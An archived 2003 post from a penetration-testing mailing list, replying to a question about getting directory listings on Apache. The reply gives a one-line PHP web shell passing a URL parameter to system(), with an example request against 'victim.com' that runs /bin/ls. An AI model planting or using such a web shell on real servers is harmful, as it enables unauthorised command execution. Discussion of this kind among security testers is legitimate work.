Penetration Testing mailing list archives
RE: Directory listing
From: "Maher Odeh" <rax () netvision net il>
Date: Sun, 11 May 2003 11:33:24 +0200
Hey to answer your question , Yes same thing can be accomplished on any platform or any webserver if you can inject the following script to an apache server running php , you will be able to execute any command for example ls -la / and see the directories etc ... Ex : <? php system($arg); ?> after you inject this file, lets say you called it break.php do the following : "http://www.victim.com/break.php?arg=/bin/ls" you will get the directories and files etc ... -----Original Message----- From: John Madden [mailto:chiwawa999 () yahoo com] Sent: Monday, May 05, 2003 8:32 PM To: pen-test () securityfocus com Subject: Directory listing Hi, In IIS/4 or 5 you can use the cmd.exe?/c+dir to get the directory of a machine how can the same be accomplish on other types of web server like Apache ? Can this be accomplished with a cgi or perl script ? Thanks John __________________________________ Do you Yahoo!? The New Yahoo! Search - Faster. Easier. Bingo. http://search.yahoo.com --------------------------------------------------------------------------- Did you know that you have VNC running on your network? Your hacker does. Plug your security holes. Download a free 15-day trial of VAM: http://www.securityfocus.com/StillSecure-pen-test ---------------------------------------------------------------------------- --------------------------------------------------------------------------- Did you know that you have VNC running on your network? Your hacker does. Plug your security holes. Download a free 15-day trial of VAM: http://www.securityfocus.com/StillSecure-pen-test ----------------------------------------------------------------------------
Current thread:
- Directory listing John Madden (May 08)
- Re: Directory listing Volker Tanger (May 09)
- <Possible follow-ups>
- RE: Directory listing Maher Odeh (May 11)